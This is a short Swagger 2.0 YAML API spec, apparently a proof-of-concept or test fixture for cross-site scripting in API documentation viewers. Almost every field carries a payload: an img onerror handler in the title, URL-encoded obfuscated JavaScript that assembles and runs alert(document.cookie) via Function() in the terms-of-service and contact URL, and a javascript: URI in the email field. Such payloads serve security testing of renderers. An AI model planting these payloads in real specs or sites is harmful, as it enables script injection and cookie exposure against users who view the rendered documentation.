swagger: "2.0"
info: 
  title: |
    <img src=x onerror=alert(1/><img src=y><)>
  description: "Please to click Terms of service"
  termsOfService: "a%3D'ale';b%3D'rt(document.cookie)';Function(a%2Bb)``;%2F%2F"
  contact: 
    name: "API Support"
    url: "a%3D'ale';b%3D'rt(document.cookie)';Function(a%2Bb)``;%2F%2F"
    email: "javascript:alert(document.domain)//"
  version: "1.0.1"
